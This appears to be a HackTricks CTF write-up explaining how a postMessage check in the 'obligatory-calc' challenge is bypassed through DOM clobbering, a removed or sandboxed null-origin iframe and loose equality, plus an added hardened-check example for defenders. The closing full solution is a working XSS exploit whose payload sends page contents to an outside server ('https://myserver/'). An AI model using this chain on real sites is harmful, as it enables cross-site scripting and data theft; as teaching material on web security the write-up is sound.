hacktricks/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md
2024-02-10 17:52:19 +00:00

Bypassing SOP with Iframes - 2

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Iframes in SOP-2

In the solution for this challenge, @Strellic_ proposes a similar method to the previous section. Let's check it.

In this challenge the attacker needs to bypass this:

```javascript
if (e.source == window.calc.contentWindow && e.data.token == window.token) {
```

If he does, he can send a postMessage with HTML content that is written into the page via innerHTML without sanitisation (XSS).

The way to bypass the first check is to make window.calc.contentWindow undefined and e.source null:

  • window.calc.contentWindow is actually document.getElementById("calc"). You can clobber document.getElementById with `<img name=getElementById />` (note that the Sanitizer API -here- is not configured to protect against DOM clobbering attacks in its default state).
  • Therefore, you can clobber document.getElementById("calc") with `<img name=getElementById /><div id=calc></div>`. Then, window.calc will be undefined.
  • Now e.source needs to be undefined or null (because == is used instead of ===, null == undefined is true). Getting this is "easy": if you create an iframe, send a postMessage from it and immediately remove the iframe, the source of the received event will be null. Check the following code:

```html
<iframe id="myIframe" src="https://example.com"></iframe>
<script>
  const iframe = document.getElementById("myIframe");
  iframe.contentWindow.postMessage("Hello", "*");
  iframe.remove();
</script>
```

```javascript
let iframe = document.createElement('iframe');
document.body.appendChild(iframe);
window.target = window.open("http://localhost:8080/");
await new Promise(r => setTimeout(r, 2000)); // wait for page to load
iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`);
document.body.removeChild(iframe); //e.origin === null
```

The way to bypass the second check about the token is to send a token with value null and make window.token undefined:

  • Sending the token in the postMessage with value null is trivial.
  • window.token is set by calling the function getCookie, which uses document.cookie. Any access to document.cookie in a null-origin page triggers an error, so window.token ends up with the value undefined.
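
To make the two bypasses above concrete from the defender's side, here is an added example (not code from the challenge or from either write-up) that puts the challenge's loose check next to a hardened one and drives both with constructed message events, so it runs under Node without a browser. The origin `https://app.example`, the stand-in window object and the token values are assumptions.

```javascript
// Added example: the challenge's check beside a hardened one, run on constructed events.
const TRUSTED_ORIGIN = "https://app.example"; // assumed origin of the calc iframe

// Same logic as the challenge's handler: loose equality on both operands.
function vulnerableCheck(e, calcWindow, token) {
  return e.source == calcWindow && e.data.token == token;
}

// Hardened version: pin the origin, refuse null/undefined on either side, and
// use strict equality, so a clobbered window reference (undefined), a failed
// cookie read (undefined token) or a torn-down sender (null e.source) never match.
function hardenedCheck(e, calcWindow, token) {
  if (e.origin !== TRUSTED_ORIGIN) return false;
  if (calcWindow == null || e.source == null) return false;
  if (typeof token !== "string" || token.length === 0) return false;
  return e.source === calcWindow && e.data.token === token;
}

// Constructed scenario 1: the legitimate iframe talking to its parent.
const calcWin = { id: "calc-window" }; // stand-in for iframe.contentWindow
const honest = { origin: TRUSTED_ORIGIN, source: calcWin, data: { token: "s3cr3t" } };

// Constructed scenario 2: the write-up's bypass. DOM clobbering left window.calc
// undefined, document.cookie threw in a null-origin page (token undefined), the
// sender removed its iframe (e.source null) and posted {token: null}.
const bypass = { origin: "null", source: null, data: { token: null } };

// Constructed scenario 3: same null/null message but arriving with the trusted
// origin, to show the null guards reject it even when the origin pin passes.
const bypassTrustedOrigin = { origin: TRUSTED_ORIGIN, source: null, data: { token: null } };

function demo() {
  return {
    vulnerableHonest: vulnerableCheck(honest, calcWin, "s3cr3t"),          // true
    vulnerableBypass: vulnerableCheck(bypass, undefined, undefined),        // true: null == undefined
    hardenedHonest: hardenedCheck(honest, calcWin, "s3cr3t"),              // true
    hardenedBypass: hardenedCheck(bypass, undefined, undefined),            // false: origin "null"
    hardenedBypassTrusted: hardenedCheck(bypassTrustedOrigin, undefined, undefined), // false: null guards
  };
}

console.log(demo());
```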

The final solution by @terjanq is the following:

```html
<html>
<body>
<script>
// Abuse the "expr" param to cause an HTML injection that
// clobbers document.getElementById and makes window.calc.contentWindow undefined
open('https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"');

function start(){
  var ifr = document.createElement('iframe');
  // Create a sandboxed iframe, as sandboxed iframes have origin null;
  // the null origin makes document.cookie throw an error, so window.token will be undefined
  ifr.sandbox = 'allow-scripts allow-popups';
  ifr.srcdoc = `<script>(${hack})()<\/script>`

  document.body.appendChild(ifr);

  function hack(){
    var win = open('https://obligatory-calc.ctf.sekai.team');
    setTimeout(()=>{
      parent.postMessage('remove', '*');
      // this bypasses the check if (e.source == window.calc.contentWindow && e.data.token == window.token), because
      // token=null is == to undefined and e.source will be null, so null == undefined
      win.postMessage({token:null, result:"<img src onerror='location=`https://myserver/?t=${escape(window.results.innerHTML)}`'>"}, '*');
    },1000);
  }

  // this removes the iframe so e.source becomes null in the postMessage event.
  onmessage = e=> {if(e.data == 'remove') document.body.innerHTML = ''; }
}
setTimeout(start, 1000);
</script>
</body>
</html>
```